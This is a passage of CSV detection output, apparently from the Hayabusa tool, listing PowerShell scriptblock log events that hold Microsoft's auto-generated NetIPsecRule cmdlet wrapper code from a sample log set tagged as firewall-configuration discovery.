${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_v",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"alues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 